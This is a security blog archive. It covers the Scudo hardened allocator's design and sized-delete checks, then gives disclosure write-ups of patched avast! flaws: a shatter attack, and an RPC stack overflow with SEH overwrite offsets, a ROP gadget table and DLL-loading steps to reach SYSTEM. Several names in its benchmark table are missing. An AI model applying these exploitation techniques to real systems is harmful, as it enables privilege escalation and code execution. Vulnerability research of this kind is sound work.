Tuesday, May 14, 2019

High level overview of Scudo

In this post, I am going to go through some high level details about the architecture of the allocator and some of the security features it offers. Some notions will only be skimmed, in the hope of covering them in detail in a later post (depending on my free time).

Scudo is made up of the following components:

  • a "primary" allocator: this is a fast allocator, servicing smaller sized requests (configurable at compile time). It is "segregated", i.e. chunks of the same size end up in the same memory region, which is compartmentalized from other regions (the separation is stronger on 64-bit, where a memory area is specifically reserved for the primary regions); chunks allocated by the primary are randomized to avoid predictable address sequences (note that the larger the size, the more predictable the addresses are relative to each other). A couple of side effects of this design are that there is no such thing as coalescing contiguous blocks, and that the memory used by the primary is never unmapped - but it can be reclaimed. While we are trying to focus on 64-bit, there is a 32-bit primary, mostly due to Android;
  • a "secondary" allocator: it wraps the platform memory allocation primitives, and as such is slower and used to service larger sized allocations. Allocations fulfilled by the secondary are surrounded by guard pages;
  • local caches: those are thread specific stashes, holding pointers to free blocks in order to relieve contention over the global free-list. There are two models: exclusive and shared. With the exclusive model, there is a unique cache per thread, which is more memory hungry but mostly free of contention. With the shared model, threads share a set number of caches, which can be dynamically reassigned at runtime based on contention - this uses less memory than the exclusive model and usually better fits the needs of end user platforms;
  • a "quarantine": it can be equated to a heap wide delayed free-list, holding recently freed blocks until a criterion is met (usually, a certain size is reached), before returning them to the primary or secondary for reuse. There is a thread-specific quarantine and a global quarantine, to avoid global locking as much as possible. This is the most impactful component in terms of memory usage and, to some extent, performance: even smaller sized quarantines will have a large impact on a process RSS, and it effectively kills locality, making any sort of memory cache less useful. As such, it is disabled by default, and can be enabled on a per-process basis (and sized according to the process needs).
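To make the quarantine idea more concrete, here is a minimal sketch of a size-bounded delayed free-list. It is a toy, not Scudo's code: the class name ToyQuarantine, the FIFO eviction order and the use of free() as the backing allocator are all assumptions made for illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdlib>
#include <deque>

// Toy quarantine (hypothetical, not Scudo's implementation): freed blocks are
// parked in a FIFO and only handed back to the backing allocator once the
// parked bytes exceed a budget.
class ToyQuarantine {
public:
  explicit ToyQuarantine(std::size_t MaxBytes) : MaxBytes(MaxBytes) {}
  ToyQuarantine(const ToyQuarantine &) = delete;
  ~ToyQuarantine() {
    // Release whatever is still parked when the quarantine goes away.
    for (const Entry &E : Blocks)
      std::free(E.Ptr);
  }

  // Called instead of free(): parks the block, then evicts the oldest
  // entries until the quarantine fits its budget again.
  void put(void *Ptr, std::size_t Size) {
    Blocks.push_back({Ptr, Size});
    Bytes += Size;
    while (Bytes > MaxBytes && !Blocks.empty()) {
      Entry Oldest = Blocks.front();
      Blocks.pop_front();
      Bytes -= Oldest.Size;
      std::free(Oldest.Ptr); // only now can the block be reused
    }
  }

  std::size_t bytes() const { return Bytes; }
  std::size_t count() const { return Blocks.size(); }

private:
  struct Entry {
    void *Ptr;
    std::size_t Size;
  };

  std::deque<Entry> Blocks;
  std::size_t Bytes = 0;
  const std::size_t MaxBytes;
};
```

With a 64-byte budget, parking three 32-byte blocks evicts the oldest one and leaves two in quarantine. The sketch also hints at the memory cost mentioned above: everything parked counts towards the RSS until it is evicted.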

Now for some security "features":

  • strong size and alignment requirements: we enforce maximum sizes and alignment values, but also check that the pointers provided are properly aligned; those are cheap checks to avoid integer overflows and catch low hanging deallocation errors (or abuse);
  • each chunk is preceded by a header, that stores basic information about the allocation, and is checksummed to be able to detect corruption.
    While the debate in-band vs out-of-band metadata divides people, the choice for an in-band header was made to be able to detect linear {over,under}flows (at least until we get memory tagging).
    The checksum of the header involves a global secret, the pointer being dealt with, and the content of the header - it is not meant to be cryptographically strong. As for the data stored in the header, it holds the size of the allocation, the state of the chunk (available, allocated, quarantined), its origin (malloc, new, new[]) and some internal data. Headers are manipulated atomically to detect race attempts between threads operating on the same chunk.
    As is usually the case with this type of mitigation, inconsistencies are only detected when the header is checked, which usually means that a heap operation has to occur on the chunk in question.
    Overall, this allows for several security checks:
    • ensure that a pointer being deallocated actually points to a chunk, otherwise the checksum verification will fail. Some other allocators gladly accept a pointer to the middle of a chunk for deallocation; we do not;
    • ensure that the state of a chunk is consistent with the operation being carried out. This allows for detection of double-frees and the like;
    • ensure that a sized-deallocation is valid for the targeted chunk, which led to the discovery of an Intel C Compiler bug, and prevents related abuse;
    • ensure that the deallocation function is consistent with the allocation function that returned the targeted chunk (eg: free/malloc, delete/new);
  • we randomize everything we can, to reduce predictability as much as possible; one of the side benefits of the thread caches is that they can make it more difficult for an attacker to get the chunks they want in the state they need, if they leverage allocation primitives in different threads;
  • guard pages are added when deemed useful;
  • we do not store pointers in free chunks, or anything really. Our arrays of free pointers (what we call transfer batches) are located in a separate memory region;
  • the quarantine helps mitigate use-after-free to some extent, making it harder for an attacker to reuse a deallocated chunk. This mitigation only goes so far, as a chunk will end up being reused at some point in time (unless you have unlimited memory);
  • the non-standalone version of Scudo also offers the possibility to set an RSS limit, which results in the allocator returning null pointers if said soft limit is exceeded (or aborting if a hard limit is set); this makes it possible to quickly check the resilience of an application to OOM conditions - I still have to add that feature to the standalone version.
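The header checks listed above can be sketched as follows. This is a simplified model under several assumptions: the field layout, the 16-bit checksum width, the FNV-1a style mixing and every name (ToyHeader, computeChecksum, checkDeallocation) are hypothetical and do not reflect Scudo's actual header or checksum.

```cpp
#include <cassert>
#include <cstdint>

enum class State : uint8_t { Available = 0, Allocated = 1, Quarantined = 2 };
enum class Origin : uint8_t { Malloc = 0, New = 1, NewArray = 2 };

// Hypothetical header layout; the real one is packed differently.
struct ToyHeader {
  uint32_t Size;
  State ChunkState;
  Origin AllocOrigin;
  uint16_t Checksum;
};

// Mixes the global secret, the chunk address and the header fields
// (the Checksum field itself is excluded). FNV-1a style, not cryptographic.
uint16_t computeChecksum(uint64_t Secret, uintptr_t Ptr, const ToyHeader &H) {
  const uint64_t Packed = (static_cast<uint64_t>(H.Size) << 16) |
                          (static_cast<uint64_t>(H.ChunkState) << 8) |
                          static_cast<uint64_t>(H.AllocOrigin);
  const uint64_t Words[3] = {Secret, static_cast<uint64_t>(Ptr), Packed};
  uint64_t Hash = 0xcbf29ce484222325ULL;
  for (uint64_t W : Words) {
    for (int I = 0; I < 8; ++I) {
      Hash ^= (W >> (8 * I)) & 0xff;
      Hash *= 0x100000001b3ULL;
    }
  }
  // Fold the 64-bit state down to the 16 bits stored in the header.
  return static_cast<uint16_t>(Hash ^ (Hash >> 16) ^ (Hash >> 32) ^ (Hash >> 48));
}

enum class Verdict { Ok, BadChecksum, InvalidState, OriginMismatch, SizeMismatch };

// DeleteSize is the size given to a sized deallocation, or -1 if unsized.
Verdict checkDeallocation(uint64_t Secret, uintptr_t Ptr, const ToyHeader &H,
                          Origin DeallocOrigin, int64_t DeleteSize) {
  if (computeChecksum(Secret, Ptr, H) != H.Checksum)
    return Verdict::BadChecksum;   // corrupted header, or not a chunk start
  if (H.ChunkState != State::Allocated)
    return Verdict::InvalidState;  // e.g. double free
  if (H.AllocOrigin != DeallocOrigin)
    return Verdict::OriginMismatch; // e.g. malloc'd chunk passed to delete
  if (DeleteSize >= 0 && static_cast<uint64_t>(DeleteSize) != H.Size)
    return Verdict::SizeMismatch;  // wrong size passed to sized delete
  return Verdict::Ok;
}
```

Because the pointer is part of the checksum input, a header found in front of an interior pointer would only verify by coincidence. A real allocator would abort on any verdict other than Ok; the sketch returns it so that the checks can be exercised.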

Friday, May 10, 2019

What is the Scudo hardened allocator?

I am going to make a small series of posts about the Scudo hardened allocator, starting with some general considerations then getting into technical details.

Scudo is a user-mode allocator which aims at providing additional mitigation against heap based vulnerabilities, while maintaining good performance. It’s open-source, part of LLVM’s compiler-rt project, and external contributions are welcome.

Scudo is currently the default allocator in Fuchsia, is enabled in some components in Android, and is used in some Google production services. While it was initially implemented on top of some of sanitizer_common’s components, it is being rewritten to be standalone, without dependencies to other compiler-rt parts, for easier use (and additional performance and security benefits).

Why another allocator?

The journey started a few years ago while exploring the landscape of usermode allocators on Linux. It is no secret that Google uses tcmalloc, and in all honesty, the internal version is blowing everything else away. By a lot. But as it was noted by my esteemed former-colleagues Sean and Agustin, its resilience to abuse is ... lackluster, to say the least.

To understand our options, let’s have a look at a somewhat typical benchmark for production services at Google, involving a lot of asynchronous threading, protobufs, RPCs and other goodies, all of that running on a 72 core Xeon machine with 512GB of RAM (this is not meant to be the most rigorous of comparisons, but it should give you an idea of what’s up). The first metric is the number of Queries Per Second, the second is the peak RSS of the program (as reported by /usr/bin/time).


Allocator             QPS (higher is better)   Max RSS (lower is better)
tcmalloc (internal)   410K                     357MB
(name missing)        356K                     1359MB
dlmalloc (glibc)      295K                     333MB
(name missing)        142K                     710MB
(name missing)        24K                      393MB
(name missing)        18K                      458MB
(name missing)        FATALERROR**
(name missing)        SIGSEGV***
scudo (standalone)    400K                     318MB

* hardened_malloc is mostly targeting Android, and only supports up to 4 arenas currently, so the comparison is not as relevant as it strongly impacts concurrency. Increasing that number leads to mmap() failures.
** Guarder only supports up to 128 threads by default, and increasing that number results in mmap() failures. Limiting the number of threads is the only way I found to make it work, but then the results are not comparable to the others.
*** I really have no idea how real world payloads ever worked with those two.

tcmalloc & jemalloc are fast, but not resilient against heap based vulnerabilities. dlmalloc is, well, sometimes more secure than others, but not as fast. The secure allocators are underperforming, when working at all. I am not going to lie, some benchmarks are less favorable to Scudo, some others more, but this one is representative of one of our target use cases.
The idea of Scudo is to fall in the category of “as fast as possible while being resilient against heap based bugs”. Scudo is not the most secure allocator, but it will (hopefully) make exploitation harder, with a variety of configurable options that allow for increased security (at a cost in performance and memory footprint, as with the Quarantine). It is also meant to be a good working ground for future mitigations (such as memory tagging, or GWP-ASan).

Origins

While various options for improving existing allocators were considered, a meeting with Kostya Serebryany led to the plan of record: building upon the existing sanitizer_common allocator to create a usermode allocator that would be part of LLVM’s compiler-rt project.

The original sanitizer allocator, which is used as a base for the ones of ASan, TSan, LSan, was originally written by Kostya and Dmitry Vyukov, and featured some pretty neat tricks that made it fast and extensible.

A decent number of things had to be changed (things were allocated from a fixed base address, in a predictable fashion, overall memory consumption was on the higher side, etc). The original version targeted Linux only, and then support came for other Google platforms, Android first, and then Fuchsia.

Aleksey Shlyapnikov did some work to make Scudo work on Solaris with SPARC ADI for some memory tagging research, but that work was never upstreamed. I will probably revisit that at some point. As for other platforms, they will be up to the community.

Fuchsia decided to adopt Scudo as their default libc allocator, which required rewriting the code to remove dependencies on sanitizer_common - and we are reaching the final stages of the upstreaming process.

Tuesday, August 14, 2018

About the C++14 sized delete operator

Alright, I am breaking a 3-year posting slumber here. Don't get too excited, I am probably not going to post regularly, but I will try to share some security and/or allocator related thoughts here.

One of the novelties introduced by C++14 was sized delete operators. Taking an extra size_t parameter, those are meant for efficiency purposes, making it possible to avoid a potentially costly lookup of the size of a chunk. To quote N3536:
"Modern memory allocators often allocate in size categories, and, for space efficiency reasons, do not store the size of the object near the object. Deallocation then requires searching for the size category store that contains the object. This search can be expensive, particularly as the search data structures are often not in memory caches."
And this is indeed the case. While someone can directly call the sized delete operator, it's usually up to the compiler to do the heavy lifting when the command line flag -fsized-deallocation is specified; it is usually enabled for -std=c++14 and above (see gcc c++ dialect options).

So what happens on the allocator side when the sized deallocation function is used? The allocator usually has a fast path function that will use the size provided to look up where the chunk will end up (see tc_free_sized for tcmalloc, je_sdallocx for jemalloc). That's great: no size to compute for a given pointer, so it's faster. But it implies that the compiler gets it right all the time (or that a programmer doesn't blindly call the sized operator with a wrong size, or that a malicious user doesn't pass a mismatched pointer to a sized deallocation function), otherwise the deleted chunk ends up in the wrong bin/freelist/*, and when it's later returned to fulfill an allocation, something bad is likely to happen.

My catastrophic thinking self expected this was going to go wrong at some point, but as far as I can tell, there was nothing much in the world of exploitable bugs related to this, except for the early implementation hiccups.

ASan's allocator has an optional check for this, and so does Scudo (an allocator I work on): if the size passed to the deallocation doesn't match the one of the chunk being deallocated, kill things as something is terribly wrong somewhere (but do not trust the size passed in any case - so much for efficiency 😕).
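As a rough illustration of the difference between trusting the size and checking it, consider the toy size-class bins below. The size classes, the ToyBins type and both function names are made up for this sketch; they are not the tcmalloc, jemalloc, ASan or Scudo implementations.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Hypothetical size classes for a toy segregated allocator.
constexpr std::size_t kClasses[] = {16, 32, 64, 128};
constexpr std::size_t kNumClasses = sizeof(kClasses) / sizeof(kClasses[0]);

// Index of the smallest class that fits Size, or kNumClasses if none does.
std::size_t classFor(std::size_t Size) {
  for (std::size_t I = 0; I < kNumClasses; ++I)
    if (Size <= kClasses[I])
      return I;
  return kNumClasses;
}

struct ToyBins {
  std::vector<void *> Free[kNumClasses];

  // Fast path: the bin is derived from the size the caller claims.
  void sizedFreeTrusting(void *Ptr, std::size_t ClaimedSize) {
    const std::size_t Class = classFor(ClaimedSize);
    assert(Class < kNumClasses);
    Free[Class].push_back(Ptr);
  }

  // Checked path: the claimed size is compared with the size recorded for
  // the chunk, and the recorded size is the one used to pick the bin.
  bool sizedFreeChecked(void *Ptr, std::size_t ClaimedSize,
                        std::size_t RecordedSize) {
    if (ClaimedSize != RecordedSize)
      return false; // a hardened allocator would abort here
    const std::size_t Class = classFor(RecordedSize);
    assert(Class < kNumClasses);
    Free[Class].push_back(Ptr);
    return true;
  }
};
```

Freeing a 128-byte chunk with a claimed size of 16 through the trusting path files it in the 16-byte bin; the checked path rejects the call instead, at the price of looking up the recorded size anyway.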

But then a few days ago, it was pointed out that the Intel Compiler was totally messing up the sized deallocation (see the compiled code). The consequences of this are entirely dependent on the allocator being used at runtime, and it looks like for most this could just result in some wasted memory (a large chunk ending up in a smaller bin), but that likely requires some additional digging (TODO(cryptoad) I guess). Anyway, if you compiled anything with ICC 18.0.0 in C++14 mode, update your compiler and recompile your binaries!

The reporter found the issue using Scudo, and it makes me somewhat happy that the check found a meaningful justification. Anyway, if you have examples of a sized deallocation gone wrong, feel free to chime in.

Thursday, August 6, 2015

avast! Shatter Attack EoP

Here is another issue in avast!, in the GUI AvastUI.exe. It allowed arbitrary code execution within the context of that trusted process, and as such EoP, self-protection bypass, etc. Exploit is provided. It was fixed about a year ago by the avast! crew.

Summary

Bug type: arbitrary function call
Vector: window message to asw_av_tray_icon_wndclass
Impact: untrusted code execution within the trusted AvastUI.exe process
Verified on: avast! Free AvastUI.exe v9.0.2018.391

Foreword

It's been a while since I had used a shatter attack for an interesting purpose! Trendy about 10 years ago (according to Wikipedia), they allowed privilege escalation thanks to core components of Windows like with MS02-071. They are mostly extinct due to Windows now restricting the messages sent to more privileged processes, or isolation of services in session 0. An old but very good presentation of the excellent Brett Moore explains them in detail.

But the problem resurfaces when a process attempts to introduce home-made integrity levels, while running as the currently logged-in user (and at the same IL). This new security boundary can be shattered thanks to Windows messages.

Description

Since we are running in the same context as AvastUI.exe, we can pretty much send any window message to its windows. This appears to be something that the developers didn't think about. For example, the window corresponding to the window class asw_av_tray_icon_wndclass accepts quite a few user messages. The following piece of code handles the message 0x83fd:

.text:00551BC0 kk_CWndWM83FDh  proc near               ; DATA XREF: .rdata:00677314 o
.text:00551BC0
.text:00551BC0 wParam          = dword ptr  8
.text:00551BC0 lParam          = dword ptr  0Ch
.text:00551BC0
.text:00551BC0                 push    ebp
.text:00551BC1                 mov     ebp, esp
.text:00551BC3                 mov     eax, [ebp+wParam]
.text:00551BC6                 test    eax, eax
.text:00551BC8                 jz      short loc_551BD3
.text:00551BCA                 push    [ebp+lParam]
.text:00551BCD                 call    eax
.text:00551BCF                 pop     ebp
.text:00551BD0                 retn    8
.text:00551BD3 ; ---------------------------------------------------------------------------
.text:00551BD3
.text:00551BD3 loc_551BD3:                             ; CODE XREF: kk_CWndWM83FDh+8 j
.text:00551BD3                 xor     eax, eax
.text:00551BD5                 pop     ebp
.text:00551BD6                 retn    8
.text:00551BD6 kk_CWndWM83FDh  endp

As you can see, this handler will interpret wParam as a function pointer and lParam as its first and only argument and call it. This obviously becomes an issue when the message is sent by a 3rd party application as it pretty much guarantees code execution within the AvastUI.exe process.
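For readers less comfortable with x86 assembly, here is a rough C++ rendering of that handler. The type aliases stand in for the Win32 WPARAM/LPARAM/LRESULT types so that the sketch compiles anywhere, and the names handleMessage83FD and attackerChosen are mine, not symbols from the binary.

```cpp
#include <cassert>
#include <cstdint>

// Portable stand-ins for WPARAM/LPARAM/LRESULT (32-bit in the original
// process, pointer-sized here).
using Param = std::uintptr_t;
using Callback = Param (*)(Param);

// Rough equivalent of kk_CWndWM83FDh: if wParam is non-null, treat it as a
// function pointer and call it with lParam as its only argument.
Param handleMessage83FD(Param wParam, Param lParam) {
  if (wParam == 0)
    return 0;
  Callback Fn = reinterpret_cast<Callback>(wParam);
  return Fn(lParam); // no validation of where Fn points
}

// Stand-in for "any function the sender chooses" (LoadLibraryA in the post).
Param attackerChosen(Param Arg) { return Arg + 1; }
```

Whoever can deliver the message picks both the function and its argument, which is exactly the call primitive described above.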

This call primitive is ideal to execute a function like LoadLibrary. We have to make the first parameter point to a string locating the DLL on the drive. Given that we are local, and that Windows doesn't do per-process randomization of DLLs, we already know the address of LoadLibraryA.

But one has to be a bit imaginative to know how to place the string into the AvastUI.exe process memory at a known location. One of the solutions that I found (that restricts the path to the DLL to *44* bytes), is to use a functionality that would put memory under our control at a known offset into the .data section of AvastUI.exe. This requires some interaction with the named pipe \\.\pipe\snx_sdesktop_pipe. The process AvastUI.exe creates 10 of those, and reads from them in the following code:

.text:0054E159                 mov     ecx, [ebp+var_30]
.text:0054E15C                 push    0               ; lpOverlapped
.text:0054E15E                 shl     ecx, 4
.text:0054E161                 add     ecx, [ebp+var_30]
.text:0054E164                 lea     eax, [ebp+var_8]
.text:0054E167                 push    eax             ; lpNumberOfBytesRead
.text:0054E168                 push    44              ; nNumberOfBytesToRead
.text:0054E16A                 lea     eax, (g_NamedPipeStructures+4)[ecx*4]
.text:0054E171                 push    eax             ; lpBuffer
.text:0054E172                 push    g_NamedPipeStructures[ecx*4] ; hFile
.text:0054E179                 call    ds:ReadFile

What I called g_NamedPipeStructures is located in the .data section of AvastUI.exe and is an array of 10 structures containing the handle to the pipes followed by a 44 byte array receiving the information read from the pipe.
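The address arithmetic in that snippet can be mirrored as below. The index is multiplied by 17 (shl 4, then add) and then by 4, so the stride between entries is 68 bytes; since the handle and the buffer only account for 48 of them, the sketch pads the remaining 20 bytes with a field I call Unknown. That field, the struct name and the helper name are assumptions inferred from the disassembly, not something recovered from symbols.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Assumed layout of one g_NamedPipeStructures entry in the 32-bit process.
struct NamedPipeEntry {
  std::uint32_t hPipe;      // 32-bit HANDLE to the named pipe
  char Buffer[44];          // receives the data read from the pipe
  std::uint8_t Unknown[20]; // remaining bytes implied by the 68-byte stride
};
static_assert(sizeof(NamedPipeEntry) == 68, "stride used by the disassembly");
static_assert(offsetof(NamedPipeEntry, Buffer) == 4, "buffer follows the handle");

// Mirrors: shl ecx, 4 / add ecx, index / lea eax, (base+4)[ecx*4]
constexpr std::uint32_t bufferAddress(std::uint32_t Base, std::uint32_t Index) {
  return Base + (((Index << 4) + Index) * 4) + 4;
}
```

Given the address of the array in .data, bufferAddress(base, 0) is the value that ends up being passed as lParam, since it points at the first 44-byte buffer under our control.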

In order to know where this structure is located in AvastUI.exe, we load the binary within our process and locate the structure thanks to a code signature. If there is no address space collision that would trigger a remapping elsewhere, that address will be the same in the remote process. We then open the 10 named pipes and write the DLL path to them to make sure all the structures will be filled with our data. Then we locate the window, and send it the window message with LoadLibraryA as wParam and the 1st structure address as lParam. This will load the DLL within the AvastUI.exe process.



In my exploit, the DLL in question will spawn a cmd.exe and call the IOCTL to make it trusted. Obviously raising a cmd.exe to trusted doesn't make much sense in a real world exploitation scenario; this is just a visual example.


Tuesday, August 4, 2015

avast! TaskEx RPC EoP (and potential RCE)

Here is a new bug, this time in English. Since most of the logic issues have been dealt with, this one will be a memory corruption, with exploit. Once again, it was patched about a year ago by the avast! team.

Summary

Bug type: stack overflow
Vector: LPC (or RPC if the ncacn_ip_tcp Chest endpoint is enabled)
Impact: EoP (or unauthenticated RCE)
Verified on: avast! Free ashTaskEx.dll v9.0.2018.391

Description

The ashTaskEx.dll implements an RPC interface that is bound to a local ncalrpc endpoint, this interface being 908d4c23-138f-4ac5-af4a-08584ae7c67b v1.0. Most of the functions offered by this interface do not enforce any specific checks and are accessible by unprivileged local users. Those functions are processed within the AvastSvc.exe binary, which runs as SYSTEM.

The function with opcode 8 of this interface has the following IDL prototype (note that the function name is mine, not a symbol):

long   kk_RpcStartRescueDiscToolkit (
 [in] handle_t  arg_1,
 [in][ref][string] wchar_t * arg_2,
 [in] long  arg_3,
 [in][ref][string] wchar_t * arg_4,
 [in] long  arg_5
);

After unmarshalling the RPC request, it ends up calling tskexStartRescueDiscToolkitImpl:

.text:64804575                 mov     [ebp+ms_exc.registration.TryLevel], 0
.text:6480457C                 push    0               ; int
.text:6480457E                 push    eax             ; RPC_arg_5
.text:6480457F                 push    [ebp+RPC_arg_4] ; int
.text:64804582                 push    ebx             ; RPC_arg_3
.text:64804583                 push    [ebp+RPC_arg_2] ; wchar_t *
.text:64804586                 call    tskexStartRescueDiscToolkitImpl

It will compare the first string with a hardcoded GUID:

.text:6480890E                 mov     ebx, [ebp+arg_0]
.text:64808911                 push    esi
.text:64808912                 push    edi
.text:64808913                 push    offset aBf0f4731Dd254a ; "{BF0F4731-DD25-4A94-8E32-F94103856229}"
.text:64808918                 push    ebx             ; wchar_t *
.text:64808919                 mov     [esp+440h+var_42C], eax
.text:6480891D                 call    ds:_wcsicmp

Edit: opcode 7 has the exact same vulnerability, with a different GUID check, and the exploit below is for that function.
If the comparison succeeds, it will proceed to copy the second string into a stack buffer:

.text:6480894E                 mov     eax, [ebp+arg_8]
.text:64808951                 lea     edx, [esp+438h+var_214]
.text:64808958                 sub     edx, eax
.text:6480895A                 lea     ebx, [ebx+0]
.text:64808960
.text:64808960 loc_64808960:                           ; CODE XREF: tskexStartRescueDiscToolkitImpl+7D j
.text:64808960                 movzx   ecx, word ptr [eax]
.text:64808963                 mov     [edx+eax], cx
.text:64808967                 lea     eax, [eax+2]
.text:6480896A                 test    cx, cx
.text:6480896D                 jnz     short loc_64808960

As you can see here, the destination buffer var_214 is located on the stack, and can hold at most 0x210 bytes before reaching the stack cookie. The copy operation looks like an inlined wcscpy. There is no check on the length of the string prior to the copy.
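To put numbers on this, the sketch below computes how many bytes such an unbounded 16-bit copy writes, next to a bounded variant that refuses oversized input. It uses char16_t as a portable stand-in for the 16-bit Windows wchar_t; the function names are hypothetical and the bounded copy is only one possible fix, not what the vendor shipped.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

constexpr std::size_t kBufferBytes = 0x210; // room before the stack cookie
constexpr std::size_t kBufferChars = kBufferBytes / sizeof(char16_t);

// Number of bytes the unbounded loop writes for Src, terminator included.
std::size_t bytesCopied(const char16_t *Src) {
  std::size_t Length = 0;
  while (Src[Length] != 0)
    ++Length;
  return (Length + 1) * sizeof(char16_t);
}

// Bounded variant: copies at most kBufferChars characters and reports
// failure (leaving a terminated, truncated string) if Src does not fit.
bool boundedCopy(char16_t (&Dst)[kBufferChars], const char16_t *Src) {
  for (std::size_t I = 0; I < kBufferChars; ++I) {
    Dst[I] = Src[I];
    if (Src[I] == 0)
      return true;
  }
  Dst[kBufferChars - 1] = 0;
  return false;
}
```

The buffer holds 264 characters including the terminator, so any string of 264 characters or more sent through the RPC interface writes past it.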

This results in a stack overflow condition, that can be exploited to achieve code execution and EoP to SYSTEM. Note that the /GS cookie check has to be bypassed to achieve this, which requires exploiting the exception handler or disclosing memory.

A heap overflow will also happen in the subfunction called by tskexStartRescueDiscToolkitImpl if the string we sent is too large, but not large enough to reach the end of the stack. It only allocates 0x4e8 bytes for the structure the string is copied in:

.text:64809D68                 push    4E8h            ; unsigned int
.text:64809D6D                 call    ??2@YAPAXIABUnothrow_t@std@@@Z ; operator new(uint,std::nothrow_t const &)

Remote exploitation

While this bug is a default local EoP on avast! Free, if the Chest remote RPC endpoint (ncacn_ip_tcp) is enabled (either in avast! Endpoint Protection or by playing with the .ini files), then this bug becomes an RCE. See the following MSDN entry about this:

"Be Wary of Other RPC Endpoints Running in the Same Process"
http://msdn.microsoft.com/en-us/library/windows/desktop/aa373564(v=vs.85).aspx

Exploit


Here are some explanations:
  • we exploit a stack overflow in an LPC interface offered by ashTaskEx.dll;
  • this function is protected by a /GS cookie, so the usual route is to go through overwriting the exception handler, which on newer platforms requires using a handler in a binary not protected by SafeSEH (this assumes that we overflow enough to get a memory access violation prior to the cookie being checked);
  • algo.dll is not SafeSEH protected. algo.dll is shipped with definitions, so I attempted my best to do something decently generic that will locate the latest version of algo.dll by looking up some registry keys and entries in the .INI files;
  • we want the overwritten exception handler to point to a gadget into algo.dll that somewhat restores the stack pointer to somewhere under our control. Luckily the DLL contains quite a lot of add esp,const & retn that will do that (with const in a ~800h-~1000h range);
  • we load algo.dll in our process, and look for that gadget. It is to be noted that given how Windows works, the base address of algo.dll in our process will be the same as in AvastSvc.exe unless we are quite unlucky;
  • at this point, we just have to build a ROP chain that will do something interesting;
  • since we are local, I decided to do something that would LoadLibrary a DLL under my control. To do so, I make one of the registers point to one of the strings sent into the RPC request (the one that didn't overflow) with some basic additions, copy it in some safe place (the .data section of algo.dll), restore a register to LoadLibraryW and trigger a push & call combination that will load the library as SYSTEM;
  • the library just creates a cmd.exe as SYSTEM on WinSta0 (you need to click a dialog to see it but at this point you see that it's won);
DeepScreen might be annoying and block access to the files, so run it without parameters for the first time to just load the DLL in the current process, and once DeepScreen is happy, run it again with 'run' as parameter to trigger the overflow. The irony here is that the overflow can happen within the DeepScreen sandbox, even if the original ends up being blocked!

Some constants that you might need to adjust based on your platform:

FillMemory( pbBuffer, 0x1000, 'A' );

Our overflowing buffer will be 0x1000 bytes. In most cases it's enough to go past the end of the stack and trigger an AV, but sometimes there is another page (or several) after the stack and that size might have to be increased.

*( DWORD_PTR * )( &pbBuffer[0x354] ) = ( DWORD_PTR )0xffffffff;          //SEH
*( DWORD_PTR * )( &pbBuffer[0x358] ) = g_GadgetLocations[0].dwpLocation; //add esp,818 & retn

Here we require that the SEH structure be at 0x354 bytes from the beginning of our overflowing buffer. This is likely specific to Windows 7 SP1 x86 up to date.

*( DWORD_PTR * )( &pbBuffer[0x20c] ) = g_GadgetLocations[1].dwpLocation; // xchg eax,ebp & retn
*( DWORD_PTR * )( &pbBuffer[0x210] ) = g_GadgetLocations[2].dwpLocation; // pop ecx & retn
*( DWORD_PTR * )( &pbBuffer[0x214] ) = ( DWORD_PTR )0xfffffc24; //ecx

Here, we require that esp+0x818 at the time of the exception handling lands at 0x20c from the beginning of our buffer. The other requirement is that our second string is at 0x3dc (-0xfffffc24) bytes from ebp at the time of the exception handling. Those are pretty much the only things that can differ from one platform to another given the same ashTaskEx.dll version.

The gadgets are pretty self explanatory:

    { { 0x81, 0xc4, 0x18, 0x08, 0x00, 0x00, 0xc3 }, 7, 0 }, //add esp,818h & retn
    { { 0x95, 0xc3 }, 2, 0 }, //xchg eax,ebp & retn
    { { 0x59, 0xc3 }, 2, 0 }, //pop ecx & retn
    { { 0x2b, 0xc1, 0x5b, 0xc3 }, 4, 0 }, //sub eax,ecx & pop ebx & retn
    { { 0x96, 0xc3 }, 2, 0 }, //xchg eax,esi & retn
    { { 0xb8, 0x90, 0x00, 0x00, 0x00, 0xc3 }, 6, 0 }, //mov eax,90h & retn
    { { 0x5d, 0xc3 }, 2, 0 }, // pop ebp & retn
    { { 0x83, 0xc4, 0x0c, 0x5e, 0x5d, 0x5f, 0x5b, 0x83, 0xc4, 0x08, 0xc2, 0x14, 0x00 }, 13, -8 }, //call _memcpy sequence
    { { 0x58, 0xc3 }, 2, 0 }, //pop eax & retn
    { { 0x55, 0xff, 0xd0, 0x0f, 0xb6, 0xc0 }, 6, 0 }, //push ebp & call eax & movzx eax,al & ...

We restore eax from ebp, restore ecx from the stack, subtract ecx from eax, with some trash ending up in ebx. Then we set eax, esi and ebp so that we can call a memcpy gadget that copies our string into the .data section of the algo.dll binary. We then call LoadLibraryW on our DLL, and ExitProcess gracefully.
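Locating such gadgets boils down to a byte-pattern search over the image loaded in our own process. The sketch below shows the idea on a plain byte vector; the Gadget struct, the reading of the third table field as an offset adjustment, and the function names are my assumptions, not the code of the exploit. The small sub32 helper illustrates why 0xfffffc24 is used: subtracting it in 32-bit arithmetic adds 0x3dc.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

struct Gadget {
  std::vector<std::uint8_t> Bytes; // opcode pattern to look for
  std::ptrdiff_t Adjust;           // assumed: added to the match offset
};

// Searches Image for the gadget pattern. On success, stores the (adjusted)
// offset of the first match in Offset and returns true.
bool findGadget(const std::vector<std::uint8_t> &Image, const Gadget &G,
                std::ptrdiff_t &Offset) {
  auto It = std::search(Image.begin(), Image.end(), G.Bytes.begin(),
                        G.Bytes.end());
  if (It == Image.end())
    return false;
  Offset = (It - Image.begin()) + G.Adjust;
  return true;
}

// 32-bit wrapping subtraction, as performed by "sub eax,ecx".
constexpr std::uint32_t sub32(std::uint32_t A, std::uint32_t B) {
  return A - B;
}
static_assert(sub32(0, 0xfffffc24u) == 0x3dcu, "-0xfffffc24 == 0x3dc");
```

In the exploit the image would be the mapped algo.dll, and the offset found would be added to its base address to get the gadget location.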

Here is the main exploit file, it's the only interesting one anyway:


Monday, August 3, 2015

avast! Self-Protection Bypass

Here is another logic issue, this time at the kernel level. It was fixed last year in the vulnerable versions of avast!.

Summary

Bug type: logic issue
Vector: IOCTL to \\.\aswSP_Open
Impact: self-protection bypass (making a process "trusted")
Verified on: avast! Free aswSP.sys v9.0.2018.391

Description

